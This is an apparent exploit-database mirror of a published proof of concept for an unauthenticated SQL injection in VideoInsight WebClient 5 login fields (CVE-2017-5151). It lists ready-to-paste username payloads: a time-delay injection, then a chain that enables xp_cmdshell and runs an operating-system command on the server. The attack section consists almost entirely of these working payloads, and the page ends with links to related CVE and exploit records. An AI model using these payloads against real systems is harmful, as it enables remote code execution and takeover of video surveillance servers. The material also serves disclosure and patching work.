Lucene search
VosecPACKETSTORM:148275HistoryJun 21, 2018 - 12:00 a.m.
VideoInsight WebClient 5 SQL Injection
2018-06-2100:00:00
vosec
packetstormsecurity.com
18
0.003 Low
EPSS
Percentile
68.2%
`# Title: VideoInsight WebClient 5 - SQL Injection
# Date: 2018-05-06
# Author: vosec
# Vendor Homepage: https://www.security.us.panasonic.com/
# Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/
# Version: 5
# Tested on: Windows Server 2008 R2
# CVE: N/A
# Description:
# This exploit is based on CVE-2017-5151 targeting versions prior.
# The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability
# that can be used for remote code execution.
# SQL Injection - PoC
# From the web login page submit the following string as the username with anything in the password field.
# The web server will hang for 5 seconds:
UyYr');WAITFOR DELAY '00:00:05'--
# Remote Code Execution - PoC
# From the web login page submit each of the following strings as the username, one at a time, with anything
# in the password field (with the ping, use a valid IP address that you can monitor):
UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;--
UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';--
`
Related
cvelist
cvelist
CVE-2017-5151
2017-02-13 21:00:00
cve
cve
CVE-2017-5151
2017-02-13 21:59:02
exploitdb
exploitdb
VideoInsight WebClient 5 - SQL Injection
2018-06-20 00:00:00
prion
prion
Sql injection
2017-02-13 21:59:00
ics
ics
VideoInsight Web Client
2017-01-19 12:00:00
exploitpack
exploitpack
VideoInsight WebClient 5 - SQL Injection
2018-06-20 00:00:00
nvd
nvd
CVE-2017-5151
2017-02-13 21:59:02